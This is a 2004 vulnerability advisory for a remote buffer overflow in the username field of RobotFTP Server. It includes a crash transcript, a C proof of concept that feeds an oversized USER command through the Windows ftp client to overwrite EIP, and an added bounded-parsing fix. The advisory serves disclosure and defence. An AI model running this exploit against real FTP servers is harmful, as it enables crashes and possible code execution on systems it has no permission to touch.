Application: Robot FTP Server http://www.robotftp.com/
Versions: 1.0/2.0 beta 1
Platforms: Windows NT
Bug: Buffer Overflow
Exploitation: remote
Date: 15 Feb 2004
Author: gsicht
e-mail: nothing.king@firemail.de

#######################################################################

1) Introduction
2) Bug
3) The Code

#######################################################################

===============
1) Introduction
===============

Quote from the Robot FTP website:

"RobotFTP server is an FTP server that will transform any windows computer into an FTP site and enable distribution of files to co-workers or friends. Robotftp Server is extremely easy to setup and configure. You can create password protected or anonymous accounts, specify folders and files that are accessible for each account, and monitor activities of connected users."

#######################################################################

======
2) Bug
======

I found a buffer overflow vulnerability in Robotftp server in the username field that allows remote command execution. I only found this vulnerability with the windows ftp client. It doesn't work with netcat or telnet.

C:\Dokumente und Einstellungen\Admin\Desktop>ftp localhost
220 Connected to RobotFTP Server
Benutzer (done:(none)):
331 User name OK, send password as PASS
Kennwort:
530 User cannot log in
Anmeldung fehlgeschlagen.
ftp> Ungültiger Befehl
ftp> user
550 Access is denied
550 Access is denied
550 Access is denied
550 Access is denied
550 Access is denied
550 Access is denied
550 Access is denied
502 Command not implemented
Anmeldung fehlgeschlagen.
ftp> Ungültiger Befehl
CRASH!!!!!!
ftp> quit

C:\Dokumente und Einstellungen\Admin\Desktop>

#######################################################################

===========
3) The Code
===========

/******************************
this is example code for the vulnerability.
It uses the windows ftp client to connect to a server
******************************/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

char buffer[2500];   /* script fed to ftp.exe via -s; global, so it is zero-filled past the last write */
char cmd[50];

int main(int argc, char *argv[])
{
    FILE *evil;

    if(argv[1] == NULL) {
        printf("Usage: %s [IP]\n\n",argv[0]);
        return 0;
    }

    /* line 1: answer to the username prompt, line 2: answer to the password prompt */
    memset(buffer,0x41,47);
    memcpy(buffer+47,"\r\n",2);
    memcpy(buffer+49,"crash",5);
    memcpy(buffer+54,"\r\n",2);
    /* line 3: the USER command with the oversized name */
    memcpy(buffer+56,"USER ",5);
    memset(buffer+61,0x41,1989);
    memset(buffer+61+1989,0x58,4);    // << overwrites the eip with XXXX
    memcpy(buffer+65+1989,"\r\n",2);

    sprintf(cmd,"ftp -s:ftp.txt %s",argv[1]);

    /* "w" rather than "a+": a rerun should overwrite the script, not append a second copy */
    if((evil = fopen("ftp.txt", "w")) != NULL) {
        fputs(buffer, evil);
        fclose(evil);
        printf("- file written!\n");
    } else {
        fprintf(stderr, "ERROR: couldn't open ftp.txt!\n");
        exit(1);
    }

    system(cmd);
    return 0;
}

/*******************************/

#######################################################################
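The server-side fix this bug calls for is to bound the USER argument before it is copied anywhere. Below is an added example of such a parser, written for this advisory and not RobotFTP's code; MAX_USER_LEN is an assumed policy limit and parse_user_cmd/probe_user_len are assumed names.

```c
/* Added example, not RobotFTP code: bounded "USER <name>" parsing that checks
 * length before copying, so a PoC-sized name is refused. MAX_USER_LEN assumed. */
#include <ctype.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>

#define MAX_USER_LEN 64

/* Parse "USER <name>\r\n" (verb case-insensitive, RFC 959) into out.
 * Returns 0 on success, -1 if malformed, -2 if the name is too long. */
int parse_user_cmd(const char *line, char *out, size_t outsz)
{
    size_t len = strlen(line), n;
    const char *p;

    if (len < 8 || strncasecmp(line, "USER ", 5) != 0)
        return -1;                  /* need verb, space, >=1 byte, CRLF */
    if (line[len - 2] != '\r' || line[len - 1] != '\n')
        return -1;                  /* exactly one CRLF-terminated line */
    p = line + 5;
    n = len - 7;                    /* bytes between "USER " and CRLF */
    if (n > MAX_USER_LEN || n >= outsz)
        return -2;                  /* refused before a single byte is copied */
    for (size_t i = 0; i < n; i++)
        if (!isprint((unsigned char)p[i]))
            return -1;              /* no control bytes, no embedded CR/LF */
    memcpy(out, p, n);
    out[n] = '\0';
    return 0;
}

/* Build "USER " + n x 'A' + CRLF and parse it; returns the parser's result,
 * so a test can show where the limit bites at PoC-sized lengths. */
int probe_user_len(size_t n)
{
    char out[MAX_USER_LEN + 1];
    char *line = malloc(n + 8);
    int rc;

    if (line == NULL)
        return -3;
    memcpy(line, "USER ", 5);
    memset(line + 5, 'A', n);
    memcpy(line + 5 + n, "\r\n", 3);  /* copies the terminating NUL too */
    rc = parse_user_cmd(line, out, sizeof out);
    free(line);
    return rc;
}
```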